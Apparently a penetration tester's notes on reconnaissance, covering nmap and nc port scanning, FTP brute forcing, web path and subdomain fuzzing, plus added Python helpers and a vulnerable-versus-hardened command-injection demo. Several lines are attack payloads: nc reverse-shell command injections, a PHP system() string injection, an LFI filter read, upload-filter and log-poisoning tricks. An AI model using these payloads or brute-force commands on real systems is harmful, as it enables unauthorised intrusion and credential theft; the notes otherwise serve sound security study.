Notes - Information Gathering
Information gathering is an important step in penetration testing, the practice of simulating an attack on a computer system, network, or web application to identify vulnerabilities and assess its security. During this phase the tester collects as much information as possible about the target: the hardware and software in use, the network configuration, and the security measures in place.
Port scanning using nmap
- Use -vvv on nmap scans to increase verbosity
// TCP Scan: fast full-port sweep first, then scripts and version detection only on the ports found (--open keeps filtered ports out of the list)
# TARGET=<TARGET> && nmap -p$(nmap -p- --open --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap
// Vulnerability Scan
# nmap -n -sV --script vuln <TARGET> -Pn -vvv
// UDP scan
# nmap -p- --min-rate=1000 -T4 <TARGET> -Pn -sU -vvv
// Output in all formats
# nmap -p- -sC -sV -oA tcp_all_ports <TARGET>
// General scan
# nmap -sC -sV -oA nmap <TARGET>
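The grep/cut pipeline in the TCP scan above keeps every line that starts with a digit, so a filtered or closed port that nmap chose to print, or a UDP line from a combined scan, ends up in the follow-up -p list. The Python below is an added example (not from the original notes) that does the same extraction while keeping only ports in state open and the protocol you ask for. The nmap output it parses is constructed inline and is not a real scan.

```python
import re
from typing import NamedTuple


class Port(NamedTuple):
    number: int
    proto: str
    state: str
    service: str


# One port line of nmap's normal (-oN / terminal) output, e.g. "135/tcp  filtered msrpc".
PORT_LINE = re.compile(r"(\d+)/(tcp|udp)\s+(\S+)\s*(\S*)")


def parse_nmap_ports(output: str) -> list[Port]:
    """Return every port line nmap printed, whatever its state."""
    ports = []
    for line in output.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return ports


def open_ports(output: str, proto: str = "tcp", include_open_filtered: bool = False) -> list[int]:
    """Open ports only: 'filtered' and 'closed' must not leak into the follow-up scan.
    UDP scans report 'open|filtered' for ports that never answered; opt in to those explicitly."""
    wanted = {"open"} | ({"open|filtered"} if include_open_filtered else set())
    return sorted({p.number for p in parse_nmap_ports(output)
                   if p.proto == proto and p.state in wanted})


def port_spec(ports) -> str:
    """Format for nmap -p, e.g. '22,80,443'."""
    return ",".join(str(p) for p in ports)


# Constructed sample in nmap's normal output format (not a real scan result).
SAMPLE_OUTPUT = """\
# Nmap 7.94 scan initiated Mon Jan  1 12:00:00 2024 as: nmap -p- --min-rate=1000 -T4 -Pn 10.10.10.10
Nmap scan report for 10.10.10.10
Host is up (0.045s latency).
Not shown: 65529 closed tcp ports (reset)
PORT      STATE         SERVICE
22/tcp    open          ssh
80/tcp    open          http
135/tcp   filtered      msrpc
443/tcp   open          https
8080/tcp  closed        http-proxy
161/udp   open|filtered snmp

# Nmap done at Mon Jan  1 12:00:30 2024 -- 1 IP address (1 host up) scanned in 30.12 seconds
"""

if __name__ == "__main__":
    print(port_spec(open_ports(SAMPLE_OUTPUT)))
```

Feed the real file in with `open_ports(open("nmap_tcp_all.nmap").read())`; the UDP variant with `include_open_filtered=True` is what you want for the -sU sweep, since silent UDP ports are exactly the ones worth probing with service scripts.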
Specific purpose scanning
FTP bruteforce
// nmap
# nmap --script ftp-brute -p 21 <TARGET> -Pn
// hydra
# hydra -C /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://<TARGET>
// ncrack
# ncrack -v -U /usr/share/wordlists/SecLists/Usernames/top-usernames-shortlist.txt -P /usr/share/wordlists/SecLists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://<TARGET>
UDP 69 tftp
# nmap -n -Pn -sU -p69 -sV --script tftp-enum <TARGET>
Simple nc scanner
nc port scanner oneliner
// Normal scanning (every probe is backgrounded, so this forks ~65k processes at once; nc reports on stderr, hence 2>)
# for p in {1..65535}; do nc -vn <TARGET> $p -w 1 -z & done 2> output.txt
// Using proxychains
# for p in {1..65535}; do proxychains -q nc -vn <TARGET> $p -w 1 -z & done 2> output.txt
bash port scanner script (pure bash, useful on a pivot host without nc or nmap)
#!/bin/bash
# Usage: ./scan.sh <TARGET>
host=$1
for port in {1..65535}; do
  # /dev/tcp/<host>/<port> is a bash builtin pseudo-device; the timeout stops filtered ports from hanging the loop,
  # and stderr is silenced so "Connection refused" noise does not drown the results
  timeout .1 bash -c "echo >/dev/tcp/$host/$port" 2>/dev/null &&
  echo "port $port is open"
done
echo "Done"
Web path discovery
General tips
- Some mis-spelled paths may give a hint
- Don't forget to search Google for known vulnerabilities in the software versions you identify
- When GET doesn’t give anything, try POST
- If cannot find HTTP, try HTTPS
dirb
// Using a common wordlist
# dirb http://<TARGET>
# dirb http://<TARGET> /usr/share/wordlists/dirb/common.txt
// Using a bigger wordlist
# dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt
// Widen the search with these extensions
# dirb http://<TARGET> /usr/share/wordlists/dirb/big.txt -X .php,.txt,.json,.html
// dirb recurses into discovered directories by default; -r switches recursion off (handy with big wordlists)
# dirb http://<TARGET> -r
// Other recommended wordlists
* /usr/share/wordlists/SecLists/Discovery/Web-Content/CGIs.txt
* /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
dirsearch
# dirsearch -u http://<TARGET> -e php,asp,aspx,jsp,js,html,txt,sql -w /usr/share/wordlists/dirb/common.txt -f -r
-e EXTENSIONS, --extensions=EXTENSIONS Extension list separated by comma (Example: php,asp)
-f, --force-extensions Force extensions for every wordlist entry (like in DirBuster)
-r, --recursive
ffuf
// Fuzz JSON parameter names in a POST body; -mc all keeps every status code and -fr drops responses containing a known "not found" string
# ffuf -w /usr/share/wordlists/dirb/big.txt -H "Content-Type: application/json" -H "Cookie:..." -X POST -u http://url/ -d '{"FUZZ": "value"}' -mc all -fr "specific_term" -c -v
wfuzz
# wfuzz -z file,/usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt --sc 200 http://<TARGET>/FUZZ
Subdomain enumeration
gobuster
# gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -u http://<TARGET>
wfuzz
# wfuzz -c -f subdomains.txt -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://<TARGET>/" -H "Host: FUZZ.<TARGET>" --hl 107
// --hl 107 hides responses with the line count of the default vhost (107 here); measure it on your target first
// Other recommended wordlists
* /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
ffuf
# ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u http://<TARGET>/ -H "Host: FUZZ.<TARGET>" -fl 10
// -fl 10 filters the default vhost response by line count in the same way
Web probing
curl
// basic-auth
# curl --user <user>:<pass> <TARGET>:<port>/pwn.php
// dump all text on a page
# curl http://<TARGET>/ | html2text
// pull href targets out of the response (the sed keeps only the last href on each line)
# curl http://<TARGET>/ | sed -n 's/.*href="\([^"]*\).*/\1/p'
# curl <TARGET> -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'
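The sed/grep one-liners above are fine for a quick look, but the href regex only returns the last link on each line and leaves relative paths unresolved. As an added example (Python, not part of the original notes), the parser below pulls the title and every href/src/action target from a saved curl response, resolves them against the page URL, de-duplicates fragments, and lists the paths that live on the target itself so they can be fed back into dirb or ffuf. The HTML and the base URL (http://target.example/) are constructed placeholders.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse


class LinkExtractor(HTMLParser):
    """Collects the page title and every href/src/action target, resolved against the page URL."""
    LINK_ATTRS = {"href", "src", "action"}

    def __init__(self, base_url: str):
        super().__init__()
        self.base_url = base_url
        self.title = ""
        self.links: list[str] = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        if tag == "title":
            self._in_title = True
        for name, value in attrs:
            if name in self.LINK_ATTRS and value:
                # Resolve relative paths against the page and drop #fragments so duplicates collapse.
                absolute = urljoin(self.base_url, value).split("#", 1)[0]
                if absolute not in self.links:
                    self.links.append(absolute)

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def parse_page(html: str, base_url: str) -> LinkExtractor:
    parser = LinkExtractor(base_url)
    parser.feed(html)
    parser.close()
    return parser


def same_host_paths(html: str, base_url: str) -> list[str]:
    """Paths on the target itself: candidates to probe directly or to seed a wordlist with."""
    host = urlparse(base_url).netloc
    return sorted({urlparse(link).path for link in parse_page(html, base_url).links
                   if urlparse(link).netloc == host})


# Constructed sample page; the host name is a placeholder, not a real site.
BASE_URL = "http://target.example/"
SAMPLE_HTML = """<html><head><title>Dev portal</title>
<link rel="stylesheet" href="/static/site.css"></head>
<body><a href="login.php">Login</a> <a href="/admin/">Admin</a> <a href="/admin/#top">Top</a>
<form action="upload.php" method="post"></form>
<script src="https://cdn.example.net/app.js"></script>
<a href="mailto:root@example.com">mail</a>
</body></html>"""

if __name__ == "__main__":
    page = parse_page(SAMPLE_HTML, BASE_URL)
    print(page.title.strip())
    print("\n".join(same_host_paths(SAMPLE_HTML, BASE_URL)))
```

Pipe a real response in with `curl -s -L http://<TARGET>/` saved to a file and passed as `html`; third-party hosts (the CDN above) are kept in `links` but excluded from `same_host_paths`, which is usually what you want during enumeration.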
lfi
// lfi via php filter (returns the base64-encoded source of index.php; decode it locally)
# curl http://<TARGET>/index.php?m=php://filter/convert.base64-encode/resource=index
// lfi via string injection: when the parameter lands inside a quoted PHP string that gets evaluated, close the quote and concatenate a call
# http://<TARGET>/index.php?page='.system('ls').'
cmd injection
- ${IFS} can be used in place of a space on Linux targets: the shell's internal field separator expands to whitespace, so a filter that only rejects literal spaces is bypassed (-e needs a traditional or ncat-style nc on the target; OpenBSD nc lacks it)
# nc${IFS}<TARGET>${IFS}<PORT>${IFS}-e${IFS}bash
- %0a (a URL-encoded newline) works as a command separator against an improperly sanitised webapp
# index.php?page=user%0a<cmd-payload>
- ; can be used to chain another command; + is the URL-encoded space here
aaaa;nc+-e+/bin/sh+<TARGET>
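The three separators above only matter because of how the server side builds its command. The following Python is an added example (not from the original notes) that puts a hypothetical vulnerable handler next to a hardened one and fires the ${IFS}, %0a and + variants at both. The vulnerable handler models the common weak case: URL-decode, reject literal spaces, then concatenate into a shell string. `echo` stands in for the real ping binary so the demo runs offline; the marker string INJECTED and the host 10.0.0.1 are constructed.

```python
import re
import subprocess
from urllib.parse import unquote_plus

# Hostname allowlist: letters, digits, dots and hyphens only, so no shell metacharacters get through.
HOST_RE = re.compile(r"[A-Za-z0-9.-]{1,253}")


def naive_space_filter(value: str) -> str:
    """A blocklist that rejects only a literal space: the kind of check the payloads below evade."""
    if " " in value:
        raise ValueError("space not allowed")
    return value


def vulnerable_ping(raw_param: str) -> str:
    """Hypothetical vulnerable handler: decode the query parameter, run it through the space
    filter, then concatenate it into a shell command line (shell=True, so /bin/sh parses it).
    `echo` replaces the real ping so this runs without network access."""
    host = naive_space_filter(unquote_plus(raw_param))
    result = subprocess.run("echo ping -c 1 " + host, shell=True,
                            capture_output=True, text=True)
    return result.stdout


def hardened_ping(raw_param: str) -> str:
    """Allowlist-validate the host and pass it as a single argv element: no shell ever parses it."""
    host = unquote_plus(raw_param)
    if not HOST_RE.fullmatch(host):
        raise ValueError("invalid host")
    result = subprocess.run(["echo", "ping", "-c", "1", host],
                            capture_output=True, text=True)
    return result.stdout


def payload_variants(host: str, cmd: str) -> dict[str, str]:
    """URL-encoded parameter values that try to smuggle `cmd` past the space filter."""
    no_space = cmd.replace(" ", "${IFS}")
    return {
        "semicolon_ifs": f"{host};{no_space}",           # ; ends the command, ${IFS} expands to whitespace
        "newline_ifs": f"{host}%0a{no_space}",           # %0a decodes to \n, also a command separator
        "plus_space": f"{host};{cmd.replace(' ', '+')}", # + decodes to a real space: the filter catches it
    }


def probe(handler, raw_param: str, marker: str = "INJECTED") -> str:
    """Classify one request: 'executed' (marker came back on its own line), 'blocked' or 'clean'."""
    try:
        out = handler(raw_param)
    except ValueError:
        return "blocked"
    return "executed" if marker in out.splitlines() else "clean"


def run_demo() -> dict[str, dict[str, str]]:
    variants = payload_variants("10.0.0.1", "echo INJECTED")
    return {
        "vulnerable": {name: probe(vulnerable_ping, value) for name, value in variants.items()},
        "hardened": {name: probe(hardened_ping, value) for name, value in variants.items()},
    }


if __name__ == "__main__":
    for handler, outcomes in run_demo().items():
        print(handler, outcomes)
```

The takeaway for the defender is in `hardened_ping`: the fix is not a longer blocklist but an allowlist plus an argv list, so the separator tricks have nothing to separate. For the attacker, `probe` is the same marker-based check you would do by hand: look for the command's output on its own line, not just for a 200.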
http headers injection
- Apache log poisoning: get PHP into the access log via the User-Agent header or the request URL, then include the log file through an LFI to reach RCE
- Use Burp to avoid encoding issues
- HTTP headers the application trusts may be spoofable, e.g.
X-Forwarded-For: 127.0.0.1
sqlmap
// get (quote the URL so the shell does not treat ? and & as glob or control characters)
# sqlmap -u "http://<TARGET>/login.php?search=test"
// post
# sqlmap -u "http://<TARGET>/login.php?login=true" -p user,password --data "user=1&password=2" --method POST
Image upload
- Some uploads only check the extension: rename the file to an allowed extension before uploading, then intercept the request and change the filename parameter in the request body back to the executable extension
- Prefer PNG where possible, because the format is cleaner than JPG/JPEG
- GIF upload: a text file that starts with the GIF87a magic bytes (without the quotes) is identified as a GIF file
svn
- Useful when you find an svn repository exposed over the web
// get commit logs
# svn log --username admin --password admin http://<TARGET>/svn/dev/
// show differences
# svn diff -r 3:1 --username admin --password admin http://<TARGET>/svn/dev/
Exploits Search
- CTF search: https://ippsec.rocks/
- CVE POC: https://github.com/nomi-sec/PoC-in-GitHub
Useful references
- Default username and passwords: https://datarecovery.com/rd/default-passwords/
- https://book.hacktricks.xyz/
- https://www.hackingarticles.in/